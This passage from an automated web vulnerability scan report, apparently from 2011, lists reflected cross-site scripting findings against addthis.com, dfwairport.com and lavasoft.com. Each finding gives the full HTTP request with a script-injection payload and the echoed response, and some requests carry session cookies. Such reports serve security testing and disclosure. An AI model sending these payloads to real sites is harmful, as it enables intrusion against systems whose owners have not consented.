Date: Wed, 07 Sep 2011 12:26:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/status8937a"-alert(1)-"f049c6759df";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.141. http://www.addthis.com/api/nai/status [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7397c<script>alert(1)</script>03437b72aad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/status7397c<script>alert(1)</script>03437b72aad?nocache=0.8315244 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/status7397c<script>alert(1)</script>03437b72aad?nocache=0.8315244</strong>
...[SNIP]...

1.142. http://www.dfwairport.com/globalentry/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dfwairport.com
Path:   /globalentry/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc0de"><script>alert(1)</script>6b250513e00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /globalentry/?fc0de"><script>alert(1)</script>6b250513e00=1 HTTP/1.1
Host: www.dfwairport.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.1
X-Cnection: close
Content-Type: text/html; charset=ISO-8859-1
Date: Wed, 07 Sep 2011 12:32:26 GMT
Content-Length: 27618
ETag: "pvd33189ac190a06bb27dc3346e56f1516"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, post-check=0, pre-check=0
Pragma: no-cache
X-PvInfo: [S10201.C29081.A24933.RA0.G0.UF68F28E3].[OT/html.OG/pages]
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv=
...[SNIP]...
<a href="mailto:&body=http://www.dfwairport.com/globalentry/?fc0de"><script>alert(1)</script>6b250513e00=1/" style="font-size:9px;">
...[SNIP]...

1.143. http://www.dfwairport.com/guide/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dfwairport.com
Path:   /guide/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a4f"><script>alert(1)</script>3f28e5e818a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /guide/index.php?29a4f"><script>alert(1)</script>3f28e5e818a=1 HTTP/1.1
Host: www.dfwairport.com
Proxy-Connection: keep-alive
Referer: http://www.dfwairport.com/globalentry/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ot38qjf16m69l8r7io24208g56; __utma=109015197.1644725450.1315416751.1315416751.1315416751.1; __utmb=109015197.1.10.1315416751; __utmc=109015197; __utmz=109015197.1315416751.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.1
X-Cnection: close
Content-Type: text/html; charset=ISO-8859-1
Date: Wed, 07 Sep 2011 12:33:52 GMT
Content-Length: 54379
ETag: "pv4d2448c074781b449d6a2a8f5d8f4bad"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, post-check=0, pre-check=0
Pragma: no-cache
X-PvInfo: [S10201.C29081.A24933.RA0.G0.U90016633].[OT/html.OG/pages]
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv=
...[SNIP]...
<a href="mailto:&body=http://www.dfwairport.com/guide/index.php?29a4f"><script>alert(1)</script>3f28e5e818a=1/" style="font-size:9px;">
...[SNIP]...

1.144. http://www.lavasoft.com/ [domain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /

Issue detail

The value of the domain request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b22e'><script>alert(1)</script>8a5fb0d26dc was submitted in the domain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?domain=4b22e'><script>alert(1)</script>8a5fb0d26dc HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:10 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:10 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27364
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name='description' c
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/?domain=4b22e'><script>alert(1)</script>8a5fb0d26dc'>
...[SNIP]...

1.145. http://www.lavasoft.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bcb9c'><script>alert(1)</script>0c3711a31a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bcb9c'><script>alert(1)</script>0c3711a31a5=1 HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:27:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:08 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:08 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27359
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name='description' c
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/?bcb9c'><script>alert(1)</script>0c3711a31a5=1'>
...[SNIP]...

1.146. http://www.lavasoft.com/css/feedback.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/feedback.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2aba5'><script>alert(1)</script>c2049abbabc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css2aba5'><script>alert(1)</script>c2049abbabc/feedback.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css2aba5'><script>alert(1)</script>c2049abbabc/feedback.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.147. http://www.lavasoft.com/css/feedback.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/feedback.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70b40'><script>alert(1)</script>b2096c0958d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/feedback.css70b40'><script>alert(1)</script>b2096c0958d?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/feedback.css70b40'><script>alert(1)</script>b2096c0958d?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.148. http://www.lavasoft.com/css/footer.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/footer.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9fd00'><script>alert(1)</script>18f3446347d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9fd00'><script>alert(1)</script>18f3446347d/footer.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10638
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css9fd00'><script>alert(1)</script>18f3446347d/footer.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.149. http://www.lavasoft.com/css/footer.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/footer.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90845'><script>alert(1)</script>d6c36072837 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/footer.css90845'><script>alert(1)</script>d6c36072837?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10638
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/footer.css90845'><script>alert(1)</script>d6c36072837?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.150. http://www.lavasoft.com/css/home.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/home.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a3fd'><script>alert(1)</script>2503f3b109a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css5a3fd'><script>alert(1)</script>2503f3b109a/home.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:16 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:16 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css5a3fd'><script>alert(1)</script>2503f3b109a/home.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.151. http://www.lavasoft.com/css/home.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/home.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cb92c'><script>alert(1)</script>e031a800279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/home.csscb92c'><script>alert(1)</script>e031a800279?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:16 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:16 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/home.csscb92c'><script>alert(1)</script>e031a800279?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.152. http://www.lavasoft.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0fcf'><script>alert(1)</script>1bfc0782f6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa0fcf'><script>alert(1)</script>1bfc0782f6d/main.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:21 GMT; path=/
Set-Cookie: country_name=United+Statesf3dbcdd25c35ee7f50f33c20; expires=Sun, 06-Nov-2011 12:27:21 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/cssa0fcf'><script>alert(1)</script>1bfc0782f6d/main.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.153. http://www.lavasoft.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 71a0f'><script>alert(1)</script>8a0b8342e83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.css71a0f'><script>alert(1)</script>8a0b8342e83?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:21 GMT; path=/
Set-Cookie: country_name=United+Statesf3dbcdd25c35ee7f50f33c20; expires=Sun, 06-Nov-2011 12:27:21 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/main.css71a0f'><script>alert(1)</script>8a0b8342e83?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.154. http://www.lavasoft.com/css/print_lavasoft.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/print_lavasoft.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2b62'><script>alert(1)</script>1aabc7e254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssd2b62'><script>alert(1)</script>1aabc7e254/print_lavasoft.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
